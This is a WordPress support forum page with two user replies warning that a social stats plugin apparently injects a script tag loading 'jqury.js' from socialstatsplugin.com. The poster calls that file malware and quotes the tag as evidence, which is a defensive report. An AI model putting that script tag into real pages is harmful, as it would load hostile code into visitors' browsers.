MrJdotnet

Forum Replies Created

Viewing 2 replies - 1 through 2 (of 2 total)
  • Thread Starter MrJdotnet

    (@mrjdotnet)

    <script src="//socialstatsplugin.com/jqury.js"></script>

    That is the file that serves the malware. It is clearly from this plugin because if you go to that domain and take a look the website links back to this plugin’s page for download.

    I agree though that I cannot see how that file gets included with the module based on the code in the WP repository. I was going by the earlier report of users having that file included on their pages. Perhaps it includes it at run time somehow or perhaps an older version of the module was doing it.

    Google “socialstatsplugin.com/jqury.js” and look at the loads of posts about it. Better to remove this plugin altogether.

    While you are in there, go down to line 313 and change what is supposed to be a closing head tag from

    <head>

    to

    </head>

Viewing 2 replies - 1 through 2 (of 2 total)